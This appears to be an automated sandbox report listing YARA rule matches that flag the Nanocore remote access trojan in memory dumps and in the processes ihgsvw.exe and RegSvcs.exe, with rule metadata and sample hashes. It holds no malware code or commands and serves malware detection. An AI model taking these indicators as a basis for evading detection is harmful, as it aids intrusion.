Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
